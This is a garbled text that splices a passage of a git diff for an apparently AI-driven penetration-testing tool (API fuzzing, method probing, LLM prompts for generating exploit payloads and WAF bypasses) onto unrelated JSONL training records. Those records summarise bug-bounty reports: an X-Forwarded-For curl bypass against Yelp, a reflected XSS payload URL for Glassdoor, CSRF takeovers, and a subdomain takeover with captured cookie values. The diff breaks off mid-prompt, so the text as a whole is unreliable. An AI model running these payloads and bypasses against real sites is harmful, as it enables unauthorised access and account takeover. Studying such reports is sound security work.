parts: + api_resources.add(parts[0]) + + # Common REST resource names to try + COMMON_RESOURCES = [ + "users", "user", "auth", "login", "register", "logout", + "profile", "settings", "admin", "posts", "articles", + "comments", "categories", "tags", "search", "upload", + "files", "images", "media", "notifications", "messages", + "products", "orders", "payments", "invoices", "customers", + "dashboard", "reports", "analytics", "logs", "events", + "webhooks", "tokens", "sessions", "roles", "permissions", + "config", "health", "status", "version", "docs", + ] + + # Common REST sub-patterns + CRUD_SUFFIXES = [ + "", "/1", "/me", "/all", "/list", "/search", + "/count", "/export", "/import", "/bulk", + ] + + for base in api_bases: + # Try common resources under each API base + for resource in COMMON_RESOURCES: + if resource not in api_resources: + inferred.add(f"{target_origin}{base}/{resource}") + # Try CRUD variants for known resources + for resource in api_resources: + for suffix in CRUD_SUFFIXES: + inferred.add(f"{target_origin}{base}/{resource}{suffix}") + + # Remove already-known endpoints + known_normalized = {_normalize_url(ep) for ep in known_endpoints} + inferred = {url for url in inferred if _normalize_url(url) not in known_normalized} + + # Batch check (parallel, capped) + to_check = sorted(inferred)[:100] + check_tasks = [self._check_url_alive(url) for url in to_check] + results = await asyncio.gather(*check_tasks, return_exceptions=True) + + discovered = [] + for url, alive in zip(to_check, results): + if alive is True: + discovered.append(EndpointInfo( + url=url, method="GET", source="api_fuzzing", priority=6, + )) + + logger.info(f"[DeepRecon] API fuzzing: {len(discovered)}/{len(to_check)} alive") + return discovered + + # ------------------------------------------------------------------ + # Multi-method discovery + # ------------------------------------------------------------------ + + async def discover_methods( + self, target: str, endpoints: List[str], sample_size: int = 20 + ) -> Dict[str, List[str]]: + """Test which HTTP methods each endpoint accepts (OPTIONS + probing).""" + results: Dict[str, List[str]] = {} + sampled = endpoints[:sample_size] + + async def _check_options(url: str) -> Tuple[str, List[str]]: + try: + session = await self._get_session() + async with session.options( + url, ssl=False, timeout=aiohttp.ClientTimeout(total=5) + ) as resp: + allow = resp.headers.get("Allow", "") + if allow: + return url, [m.strip().upper() for m in allow.split(",")] + # Also check Access-Control-Allow-Methods + cors = resp.headers.get("Access-Control-Allow-Methods", "") + if cors: + return url, [m.strip().upper() for m in cors.split(",")] + except Exception: + pass + return url, [] + + tasks = [_check_options(url) for url in sampled] + responses = await asyncio.gather(*tasks, return_exceptions=True) + + for resp in responses: + if isinstance(resp, tuple): + url, methods = resp + if methods: + results[url] = methods + + return results + # ------------------------------------------------------------------ # Deep technology fingerprinting # ------------------------------------------------------------------ _FINGERPRINT_FILES = [ "/readme.txt", "/README.md", "/CHANGELOG.md", "/CHANGES.txt", - "/package.json", "/composer.json", + "/package.json", "/composer.json", "/Gemfile.lock", + "/requirements.txt", "/go.mod", "/pom.xml", "/build.gradle", ] _WP_PROBES = [ @@ -349,6 +856,18 @@ class DeepRecon: _add(name, ver, path) except (json.JSONDecodeError, ValueError): pass + elif path == "/go.mod": + m = re.search(r'^module\s+(\S+)', content, re.MULTILINE) + if m: + _add(m.group(1), "go-module", path) + for dep_m in re.finditer(r'^\s+(\S+)\s+(v[\d.]+)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) + elif path == "/requirements.txt": + for dep_m in re.finditer(r'^([a-zA-Z0-9_\-]+)==([\d.]+)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) + elif path == "/Gemfile.lock": + for dep_m in re.finditer(r'^\s{4}([a-z_\-]+)\s+\(([\d.]+)\)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) else: m = self.RE_VERSION.search(content) if m: @@ -375,3 +894,84 @@ class DeepRecon: _add("Drupal", m.group(1), dp_path) return results + + # ------------------------------------------------------------------ + # Comprehensive recon pipeline + # ------------------------------------------------------------------ + + async def full_recon( + self, target: str, technologies: List[str], + js_urls: List[str], known_endpoints: List[str], + ) -> Dict: + """Run ALL recon phases and return aggregated results.""" + results: Dict = { + "sitemap_urls": [], + "robots_paths": [], + "js_analysis": None, + "api_schema": None, + "framework_endpoints": [], + "fuzzed_endpoints": [], + "method_map": {}, + "fingerprints": [], + "all_endpoints": [], + } + + # Run independent phases in parallel + sitemap_task = self.parse_sitemap(target) + robots_task = self.parse_robots(target) + js_task = self.crawl_js_files(target, js_urls) if js_urls else asyncio.sleep(0) + api_task = self.enumerate_api(target, technologies) + fw_task = self.discover_framework_endpoints(target, technologies) + + sitemap_result, robots_result, js_result, api_result, fw_result = \ + await asyncio.gather(sitemap_task, robots_task, js_task, api_task, fw_task, + return_exceptions=True) + + if isinstance(sitemap_result, list): + results["sitemap_urls"] = sitemap_result + if isinstance(robots_result, tuple): + results["robots_paths"] = robots_result[0] + if isinstance(js_result, JSAnalysisResult): + results["js_analysis"] = js_result + if isinstance(api_result, APISchema): + results["api_schema"] = api_result + if isinstance(fw_result, list): + results["framework_endpoints"] = fw_result + + # Aggregate all discovered endpoints + all_eps = set(known_endpoints) + all_eps.update(results["sitemap_urls"]) + all_eps.update(results["robots_paths"]) + if results["js_analysis"]: + all_eps.update(results["js_analysis"].endpoints) + if results["api_schema"]: + for ep in results["api_schema"].endpoints: + url = ep.get("url", "") + if url.startswith("/"): + all_eps.add(urljoin(target, url)) + elif url.startswith("http"): + all_eps.add(url) + for fw_ep in results["framework_endpoints"]: + all_eps.add(fw_ep.url) + + # Now run API fuzzing with ALL known endpoints + try: + fuzzed = await self.fuzz_api_patterns(target, sorted(all_eps)) + if isinstance(fuzzed, list): + results["fuzzed_endpoints"] = fuzzed + for ep in fuzzed: + all_eps.add(ep.url) + except Exception as e: + logger.warning(f"[DeepRecon] API fuzzing error: {e}") + + # Discover methods for a sample + try: + methods = await self.discover_methods(target, sorted(all_eps)) + results["method_map"] = methods + except Exception as e: + logger.warning(f"[DeepRecon] Method discovery error: {e}") + + results["all_endpoints"] = sorted(all_eps)[:MAX_ENDPOINTS] + logger.info(f"[DeepRecon] Total endpoints discovered: {len(results['all_endpoints'])}") + + return results diff --git a/backend/core/vuln_engine/ai_prompts.py b/backend/core/vuln_engine/ai_prompts.py index 4ba5b9b..978c0f0 100755 --- a/backend/core/vuln_engine/ai_prompts.py +++ b/backend/core/vuln_engine/ai_prompts.py @@ -1624,3 +1624,476 @@ VULN_AI_PROMPTS: Dict[str, dict] = { "technology_hints": {"general": "OWASP API Security #3. Check: REST APIs without field selection, GraphQL without proper field-level authorization, response serializers including all model fields."} }, } + + +# --------------------------------------------------------------------------- +# Deep Test Prompts — AI-driven iterative testing loop +# --------------------------------------------------------------------------- + +def get_deep_test_plan_prompt( + vuln_type: str, + context: str, + playbook_ctx: str = "", + iteration: int = 1, + previous_results: str = "", +) -> str: + """Build the PLANNING prompt for _ai_deep_test() Step 2. + + The LLM receives full context about the endpoint and must generate + specific, targeted test cases — not generic payloads. + + Args: + vuln_type: The vulnerability type being tested (e.g., "sqli_error") + context: Rich context string (endpoint, baseline, tech, WAF, params) + playbook_ctx: Playbook methodology context for this vuln type + iteration: Current iteration number (1-3) + previous_results: JSON string of previous test results (for iterations 2+) + """ + # Get per-type proof requirements + proof_req = "" + try: + from backend.core.vuln_engine.system_prompts import VULN_TYPE_PROOF_REQUIREMENTS + proof_req = VULN_TYPE_PROOF_REQUIREMENTS.get(vuln_type, "") + except ImportError: + pass + + # Get per-type AI prompt for detection strategy + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + detection = type_prompt.get("detection_strategy", "") + methodology = type_prompt.get("test_methodology", "") + payload_hints = type_prompt.get("payload_selection", "") + + iteration_context = "" + if iteration > 1 and previous_results: + iteration_context = f""" +## PREVIOUS TEST RESULTS (Round {iteration - 1}) +You have already tested this endpoint. Here are the ACTUAL server responses: + +{previous_results} + +IMPORTANT: Analyze what happened. What did the server do with your input? +- Did any payload cause an error? → Exploit that error pattern. +- Did any payload get reflected? → Check encoding, try context escape. +- Did any payload change the response? → Investigate what changed and why. +- Did all payloads get blocked? → Try encoding/obfuscation bypass. +- Did the server behave identically for all inputs? → Endpoint likely NOT vulnerable. + +Generate NEW test cases that build on what you learned. Do NOT repeat previous payloads. +""" + + return f"""You are an expert penetration tester performing Round {iteration} of iterative {vuln_type.upper()} testing. + +## TARGET CONTEXT +{context} + +{f"## DETECTION STRATEGY" + chr(10) + detection if detection else ""} +{f"## METHODOLOGY" + chr(10) + methodology if methodology else ""} +{f"## PAYLOAD HINTS" + chr(10) + payload_hints if payload_hints else ""} +{playbook_ctx} +{f"## PROOF REQUIREMENTS" + chr(10) + proof_req if proof_req else ""} +{iteration_context} + +## YOUR TASK +Generate {3 if iteration == 1 else 5} specific test cases for {vuln_type} on this endpoint. +Each test must be a concrete HTTP request — not a description of what to test. + +Respond ONLY with JSON: +{{ + "reasoning": "Brief explanation of your testing strategy based on the context", + "tests": [ + {{ + "name": "Descriptive name of the test", + "rationale": "Why this specific test based on what you observed", + "method": "GET|POST|PUT|DELETE", + "url": "Full URL to test (use actual URLs from context)", + "params": {{"param_name": "payload_value"}}, + "headers": {{"Header-Name": "value"}}, + "body": "request body if POST/PUT (or empty string)", + "content_type": "application/x-www-form-urlencoded|application/json|text/xml", + "injection_point": "parameter|header|body|path", + "success_indicators": ["what to look for in response that proves vulnerability"], + "failure_indicators": ["what indicates NOT vulnerable"] + }} + ] +}} + +RULES: +- Use ACTUAL URLs and parameters from the context — don't invent endpoints. +- Each test MUST have a clear rationale tied to the target's behavior. +- Include both aggressive tests (exploit attempts) and subtle probes (behavior mapping). +- If this is Round 2+, your tests MUST be adapted based on previous results.""" + + +def get_deep_test_analysis_prompt( + vuln_type: str, + test_results: str, + baseline: str = "", + iteration: int = 1, +) -> str: + """Build the ANALYSIS prompt for _ai_deep_test() Step 4. + + The LLM receives actual HTTP responses and must analyze them + for vulnerability indicators with anti-hallucination enforcement. + + Args: + vuln_type: The vulnerability type being tested + test_results: JSON string of test results with actual HTTP responses + baseline: Baseline response data for comparison + iteration: Current iteration number + """ + # Get per-type proof requirements + proof_req = "" + try: + from backend.core.vuln_engine.system_prompts import VULN_TYPE_PROOF_REQUIREMENTS + proof_req = VULN_TYPE_PROOF_REQUIREMENTS.get(vuln_type, "") + except ImportError: + pass + + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + verification = type_prompt.get("verification_criteria", "") + fp_indicators = type_prompt.get("false_positive_indicators", "") + + return f"""Analyze these HTTP responses for {vuln_type.upper()} vulnerability. +This is Round {iteration} of iterative testing. + +## BASELINE RESPONSE (normal behavior without attack payload) +{baseline if baseline else "Not available — compare between test responses instead."} + +## TEST RESULTS (actual server responses) +{test_results} + +{f"## VERIFICATION CRITERIA" + chr(10) + verification if verification else ""} +{f"## KNOWN FALSE POSITIVE PATTERNS" + chr(10) + fp_indicators if fp_indicators else ""} +{f"## PROOF REQUIREMENTS" + chr(10) + proof_req if proof_req else ""} + +## ANALYSIS INSTRUCTIONS + +For EACH test result, analyze: +1. Did the response differ from baseline? How exactly? (status, body, headers, timing) +2. Is the difference CAUSED by the payload, or is it generic application behavior? +3. Does the response contain proof of execution (not just delivery)? +4. Would you stake your professional reputation on this finding? + +ANTI-HALLUCINATION CHECK: +- ONLY cite evidence that appears in the ACTUAL response data above. +- Do NOT infer, assume, or speculate about what "might" happen. +- If the evidence is ambiguous, it is NOT confirmed. + +Respond ONLY with JSON: +{{ + "analysis": [ + {{ + "test_name": "Name of the test analyzed", + "is_vulnerable": true|false, + "confidence": "high|medium|low", + "evidence": "EXACT string/pattern from the actual response that proves it", + "reasoning": "Why this specific evidence proves (or disproves) the vulnerability" + }} + ], + "overall_vulnerable": true|false, + "continue_testing": true|false, + "next_round_strategy": "What to try next if continue_testing is true (or 'done' if false)", + "summary": "One-line summary of findings" +}} + +CRITICAL: Set "continue_testing": true ONLY if you observed promising signals that +warrant deeper investigation. If all tests show no vulnerability indicators, set false.""" + + +# --------------------------------------------------------------------------- +# Pre-Stream Master Planning Prompt — AI context before parallel streams +# --------------------------------------------------------------------------- + +def get_master_plan_prompt( + target: str, + initial_response: str = "", + technologies: str = "", + endpoints_preview: str = "", + forms_preview: str = "", + waf_info: str = "", + playbook_context: str = "", +) -> str: + """Build the master planning prompt executed BEFORE the 3 parallel streams. + + This gives the AI full initial context and asks it to produce a strategic + test plan that all 3 streams can reference for context-aware testing. + """ + return f"""You are a senior penetration tester planning a comprehensive security assessment. + +## TARGET +URL: {target} + +## INITIAL RECONNAISSANCE +{f"### Response Headers & Body Fingerprint" + chr(10) + initial_response if initial_response else "Initial probe not yet available."} + +{f"### Technologies Detected" + chr(10) + technologies if technologies else "Not yet detected."} + +{f"### Endpoints Discovered" + chr(10) + endpoints_preview if endpoints_preview else "No endpoints discovered yet."} + +{f"### Forms Found" + chr(10) + forms_preview if forms_preview else "No forms found yet."} + +{f"### WAF Detection" + chr(10) + waf_info if waf_info else "No WAF detected."} + +{playbook_context} + +## YOUR TASK +Create a MASTER TEST PLAN for this target. This plan will guide 3 parallel testing streams: +1. **Recon Stream** — what to look for during deeper reconnaissance +2. **Testing Stream** — which vulnerability types to prioritize and why +3. **Tool Stream** — which security tools would be most effective + +Analyze the target's technology stack, response patterns, and attack surface to produce: + +Respond ONLY with JSON: +{{ + "target_profile": "Brief description of what this application appears to be", + "technology_assessment": "Key technologies and their security implications", + "attack_surface_summary": "Primary attack vectors based on initial recon", + "priority_vuln_types": ["ordered list of 10-15 vuln types most likely to succeed"], + "high_value_endpoints": ["endpoints that deserve the most attention"], + "recon_guidance": {{ + "focus_areas": ["what the recon stream should specifically look for"], + "hidden_surface_hints": ["directories, API patterns, or configs to probe"] + }}, + "testing_strategy": {{ + "immediate_tests": ["vuln types to test RIGHT NOW on the main URL"], + "tech_specific_tests": ["tests specific to the detected technology stack"], + "bypass_strategies": ["WAF bypass or encoding strategies if WAF detected"] + }}, + "tool_recommendations": {{ + "priority_tools": ["tools to run first and why"], + "tool_arguments": ["specific flags or wordlists for this target"] + }}, + "risk_assessment": "Overall risk level and what makes this target interesting" +}} + +RULES: +- Base your analysis on ACTUAL data from the initial probe — don't speculate. +- Prioritize vuln types by LIKELIHOOD of success on THIS specific target. +- Consider the technology stack when recommending tests (e.g., Java → deserialization, PHP → LFI). +- If WAF is detected, factor bypass strategies into every recommendation.""" + + +# --------------------------------------------------------------------------- +# Junior Stream AI Payload Generation Prompt +# --------------------------------------------------------------------------- + +def get_junior_ai_test_prompt( + url: str, + vuln_type: str, + params: list, + method: str = "GET", + tech_context: str = "", + master_plan_context: str = "", + waf_info: str = "", +) -> str: + """Build prompt for AI-generated payloads in Stream 2 junior testing. + + Instead of hardcoded 3 payloads, the AI generates context-aware payloads + tailored to the specific endpoint, parameters, and technology stack. + """ + # Get per-type detection strategy + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + detection = type_prompt.get("detection_strategy", "") + payload_hints = type_prompt.get("payload_selection", "") + + params_str = ", ".join(params[:5]) if params else "unknown" + + return f"""You are a penetration tester performing quick, targeted {vuln_type.upper()} testing. + +## TARGET +URL: {url} +Method: {method} +Parameters: {params_str} +{f"Technologies: {tech_context}" if tech_context else ""} +{f"WAF: {waf_info}" if waf_info else ""} +{f"Master Plan Context: {master_plan_context}" if master_plan_context else ""} + +{f"## DETECTION STRATEGY" + chr(10) + detection if detection else ""} +{f"## PAYLOAD HINTS" + chr(10) + payload_hints if payload_hints else ""} + +## YOUR TASK +Generate 3-5 targeted {vuln_type} payloads for this specific endpoint. +Each payload must be crafted for the actual parameters and technology stack. + +Respond ONLY with JSON: +{{ + "reasoning": "Brief strategy for testing this endpoint", + "tests": [ + {{ + "param": "parameter name to inject into", + "payload": "the actual payload string", + "method": "GET|POST", + "injection_point": "parameter|header|body", + "header_name": "header name if injection_point is header", + "success_indicator": "what to look for in response" + }} + ] +}} + +RULES: +- Use ACTUAL parameter names from the target. +- Tailor payloads to the technology stack (don't send PHP payloads to Java apps). +- If WAF is detected, use encoding/obfuscation in payloads. +- Include at least one probe payload (behavior mapping) and one exploit payload. +- Keep it fast — max 5 payloads.""" + + +# --------------------------------------------------------------------------- +# Tool Output AI Analysis Prompt +# --------------------------------------------------------------------------- + +def get_tool_analysis_prompt( + tool_name: str, + tool_output: str, + target: str, + existing_findings_summary: str = "", +) -> str: + """Build prompt for AI analysis of security tool output in Stream 3. + + Instead of just ingesting raw tool findings, the AI analyzes the output + to identify real vulnerabilities, filter noise, and suggest follow-up tests. + """ + return f"""You are a senior penetration tester analyzing output from the security tool "{tool_name}". + +## TARGET +{target} + +## TOOL OUTPUT (raw stdout/stderr) +``` +{tool_output[:4000]} +``` + +{f"## EXISTING FINDINGS (already confirmed)" + chr(10) + existing_findings_summary if existing_findings_summary else ""} + +## YOUR TASK +Analyze this tool output with expert judgment: + +1. **True Findings**: Identify REAL vulnerabilities from the output (not informational noise) +2. **False Positives**: Flag findings that are likely false positives and explain why +3. **Follow-Up Tests**: Suggest manual tests to confirm ambiguous findings +4. **Hidden Insights**: What does this output reveal about the target that isn't obvious? + +Respond ONLY with JSON: +{{ + "real_findings": [ + {{ + "title": "Finding title", + "severity": "critical|high|medium|low|info", + "vulnerability_type": "vuln_type_name", + "endpoint": "affected URL", + "evidence": "exact evidence from tool output", + "confidence": "high|medium|low", + "reasoning": "why this is a real finding" + }} + ], + "false_positives": [ + {{ + "title": "What the tool flagged", + "reason": "why it's a false positive" + }} + ], + "follow_up_tests": [ + {{ + "test": "what to test manually", + "vuln_type": "vuln_type_name", + "endpoint": "URL to test", + "rationale": "why this follow-up is needed" + }} + ], + "target_insights": "What this tool output reveals about the target's security posture" +}} + +RULES: +- Only mark findings as "real" if the tool output contains concrete evidence. +- Default scanner informational items (server headers, allowed methods) are NOT vulnerabilities. +- Consider existing findings — don't flag duplicates. +- Focus on ACTIONABLE output, not noise.""" + + +# --------------------------------------------------------------------------- +# Recon AI Endpoint Analysis Prompt +# --------------------------------------------------------------------------- + +def get_recon_analysis_prompt( + target: str, + endpoints: str, + forms: str = "", + technologies: str = "", + parameters: str = "", + js_files: str = "", + api_endpoints: str = "", +) -> str: + """Build prompt for AI analysis of recon results in Stream 1. + + After endpoint discovery, AI analyzes the full attack surface to + prioritize endpoints and identify hidden attack vectors. + """ + return f"""You are a penetration tester analyzing reconnaissance results. + +## TARGET +{target} + +## DISCOVERED ENDPOINTS +{endpoints} + +{f"## FORMS" + chr(10) + forms if forms else ""} +{f"## TECHNOLOGIES" + chr(10) + technologies if technologies else ""} +{f"## PARAMETERS" + chr(10) + parameters if parameters else ""} +{f"## JAVASCRIPT FILES" + chr(10) + js_files if js_files else ""} +{f"## API ENDPOINTS" + chr(10) + api_endpoints if api_endpoints else ""} + +## YOUR TASK +Analyze this reconnaissance data as a penetration tester would: + +1. **Endpoint Prioritization**: Rank endpoints by attack potential +2. **Hidden Surface**: Identify probable hidden endpoints or patterns +3. **Parameter Analysis**: Flag high-risk parameters based on naming conventions +4. **Technology Vulnerabilities**: Map technologies to known vulnerability classes +5. **Attack Chains**: Identify potential multi-step attack paths + +Respond ONLY with JSON: +{{ + "high_priority_endpoints": [ + {{ + "url": "endpoint URL", + "risk_score": 1-10, + "reason": "why this endpoint is high priority", + "suggested_vuln_types": ["vuln types to test"] + }} + ], + "hidden_endpoints_to_probe": [ + {{ + "url": "URL pattern to try", + "rationale": "why this might exist" + }} + ], + "high_risk_parameters": [ + {{ + "param": "parameter name", + "endpoint": "where found", + "risk_type": "what kind of injection it's susceptible to", + "priority": "high|medium|low" + }} + ], + "tech_vuln_mapping": [ + {{ + "technology": "tech name", + "vuln_types": ["relevant vuln types"], + "specific_tests": ["targeted test recommendations"] + }} + ], + "attack_chains": [ + {{ + "chain": "Step 1 → Step 2 → Impact", + "starting_point": "where to begin" + }} + ], + "additional_recon_suggestions": ["What else to look for"] +}} + +RULES: +- Base ALL analysis on the actual data provided — don't invent endpoints. +- Prioritize by LIKELIHOOD of exploitation, not theoretical severity. +- Consider technology-specific vulnerabilities (e.g., Spring → actuator, WordPress → wp-admin). +- Flag parameters like 'url', 'file', 'path', 'redirect', 'callback', 'template' as high-risk.""" diff --git a/backend/core/vuln_engine/system_prompts.py b/backend/core/vuln_engine/system_prompts.py index 9c4e028..6412969 100755 --- a/backend/core/vuln_engine/system_prompts.py +++ b/backend/core/vuln_engine/system_prompts.py @@ -268,6 +268,41 @@ belongs to another user or represents privileged information. When in doubt, do three-way comparison: (1) your data, (2) target ID as you, (3) target ID as target user.""" +PROMPT_ITERATIVE_TESTING = """## ITERATIVE TESTING (OBSERVE → ADAPT → EXPLOIT) + +You are testing ITERATIVELY. Each round, you see the actual server responses from your +previous tests. Use this feedback to refine your attack. + +OBSERVE → HYPOTHESIZE → TEST → ANALYZE → ADAPT: + +1. OBSERVE: Study the response carefully — status code, headers, body content, timing. + What does the server actually DO with your input? + +2. HYPOTHESIZE: Based on observed behavior, form a specific hypothesis: + - "Parameter reflects input unencoded → likely XSS" + - "Single quote causes 500 → backend SQL parsing fails → try error-based SQLi" + - "Different response for id=1 vs id=2 → possible IDOR" + - "Response includes external URL content → SSRF confirmed, try internal targets" + +3. TEST: Design your next test to confirm or deny the hypothesis. + Target the SPECIFIC behavior you observed — don't spray generic payloads. + +4. ANALYZE: Did the hypothesis hold? What new information did you learn? + - Error message leaked DB type → now try DB-specific injection syntax + - WAF blocked \n\n
\n\n \n\n \n\n
\n\n \n\n\n```\n3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content .\n\n/!\\ You can't add a same filtered content this will generate a 400 HTTP Response code /!\\\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nAllow a attacker add filtered content to a target/victim account."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: X-Forward-For Header allows to bypass access restrictions"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nIf the \"X-Forward-For: 127.0.0.1\" header is used, it allows to bypass restrictions of the web application and access endpoints that are restricted otherwise. This allows for example to access the \"Business Owner App backend API\". The responding server thinks, he is accessed by an internal IP.\n\n### Passos para Reproduzir\nPOC1:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/status \n\n{\"error\": {\"id\": \"PredicateMismatch\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/status -H \"X-Forwarded-For: 127.0.0.1\"\n\n{\"host\": \"biz--app-main--useast1-74dd77b89b-fgtdk\", \"health\": {}, \"mem_vsz\": 1111.61328125, \"mem_rss\": 410.0, \"pid\": 91941, \"uptime\": 178784.86051034927, \"version\": null}\n```\n\nPOC2:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json \n{\"error\": {\"id\": \"HTTPNotFound\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json -H \"X-Forwarded-For: 127.0.0.1\" \n█████\n█████\n███████\n█████████\n████\n███\n████\n██████\n█████████ \n██████████ [...]\n```\n\nThe responding server thinks, it is accessed by an internal IP as can be seen in the headers:\n```\nHTTP/1.1 200 OK\nConnection: close\nserver: openresty/1.13.6.2\ncontent-type: application/json\nx-b3-sampled: 0\nx-is-internal-ip-address: true\nx-zipkin-id: 2fce61c10ade1e32\nx-routing-service: routing-main--useast1-d84b86b87-cwstn; site=biz_app\nx-mode: ro\nx-proxied: 10-65-64-83-useast1aprod\nx-extlb: 10-65-64-83-useast1aprod\nAccept-Ranges: bytes\nDate: Mon, 19 Oct 2020 12:21:19 GMT\nVia: 1.1 varnish\nX-Served-By: cache-hhn4033-HHN\nX-Cache: MISS\nX-Cache-Hits: 0\nContent-Length: 573093\n```\n\n### Impacto\nAs the attacker is seen as having an internal IP he is able to access resources which should otherwise be restricted for him."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true via PATH"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Navigate to https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n 2. input the payload inside path.\n\n 3.Open this url: https://www.glassdoor.co.in/FAQ/Mic%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e\nrosoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n\n An alert will be popped up.\n\n### Impacto\nUsing XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CSRF to account takeover in https://█████/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is no protection against CSRF in changing email which lead to CSRF to account takeover on https://██████/.\n\n### Impacto\nIt is a critical issue as i was able to takeover anyone account using this attack. This vulnerability is high/critical because I was able to perform account takeover"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Subdomains https://register.acronis.com, https://promo.acronis.com, https://info.acronis.com and https://promosandbox.acronis.com \nare vulnerable to takeover due to unclaimed marketo CNAME records. Anyone is able to own these subdomains at the moment.\n\nThis vulnerability is called subdomain takeover. You can read more about it here:\n\n https://blog.sweepatic.com/subdomain-takeover-principles/\n https://hackerone.com/reports/32825\n https://hackerone.com/reports/779442\t\n https://hackerone.com/reports/175070\n\n### Passos para Reproduzir\n```\nnslookup register.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses:104.17.74.206\n 104.17.72.206\n 104.17.70.206\n 104.17.73.206\n 104.17.71.206\nAliases: register.acronis.com\n acronis.mktoweb.com\n\nnslookup promo.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses: 104.17.71.206\n 104.17.70.206\n 104.17.74.206\n 104.17.72.206\n 104.17.73.206\nAliases: promo.acronis.com\n acronis.mktoweb.com\n\n```\n\nCNAMES entries to corresponding domains are as:\n```\npromo.acronis.com acronis.mktoweb.com\npromosandbox.acronis.com acronissandbox2.mktoweb.com\nregister.acronis.com acronis.mktoweb.com\ninfo.acronis.com \t mkto-h0084.com\n```\n\nAs register.acronis.com and promo.acronis.com pointing to CNAME record as acronis.mktoweb.com and are aliases to acronis.mktoweb.com . http://acronis.mktoweb.com/ is giving 404, page not found with message \"The requested URL was not found on this server\" which can be claimed by anyone now and would result in subdomain takeover.\n\nThe marketo document to Customize Your Landing Page URLs with a CNAME\nhttps://docs.marketo.com/display/public/DOCS/Customize+Your+Landing+Page+URLs+with+a+CNAME\n\n**As marketo is a paid service and offers account for marketing automation, I don't have a registered account. \nI wrote to Marketo technical support team and they claim the availability of listed domains as the listed domains are not in use or configured anymore.**\n\n### Impacto\nWith this, I can clearly see XSS impact in your case. Please have a look at your /v2/account request intercepted below:\nRequest:\n```\nPUT /v2/account HTTP/1.1\nHost: account.acronis.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nContent-Length: 702\nOrigin: https://register.acronis.com\nConnection: close\nReferer: https://account.acronis.com/\nCookie: _gcl_au=1.1.36144172.1601449011; _ga=GA1.2.1290766356.1601449012; _fbp=fb.1.1601449012432.633797135; _hjid=a7dd36be-ea53-40b1-b04e-c2a96f5ebc3c; optimizelyEndUserId=oeu1601449014822r0.42778295429069313; OptanonConsent=isIABGlobal=false&datestamp=Mon+Oct+26+2020+16%3A35%3A28+GMT%2B0530+(India+Standard+Time)&version=6.6.0&hosts=&consentId=07081eac-3ae3-443d-8451-79f5327d9351&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0003%3A1%2CC0002%3A1&AwaitingReconsent=false&geolocation=IN%3BHR; _mkto_trk=id:929-HVV-335&token:_mch-acronis.com-1601449020651-40834; OptanonAlertBoxClosed=2020-10-26T11:05:28.204Z; visid_incap_1638029=Bol4fqOiQTKxMXB55rfSHvSPlF8AAAAAQUIPAAAAAACe+MbhqMW1sJI4dpZBH6DI; _hjTLDTest=1; nlbi_1638029=ibxAVmtdEHzy/Y9u+BxnEAAAAAB308NLs7A3ARoQwyk4Cyrg; incap_ses_745_1638029=ddKxJtFthhy2IeNut8VWCvWPlF8AAAAACuwA/vpt+9dXQmj6hoxBWQ==; _gid=GA1.2.639811834.1603690260; _gac_UA-149943-47=1.1603691724.Cj0KCQjwxNT8BRD9ARIsAJ8S5xZC0_Hlxu0wgG7xA0-jU5eIi2BxoGFsRealW_kNcbHRyB_H8h3z-y0aAjFAEALw_wcB; 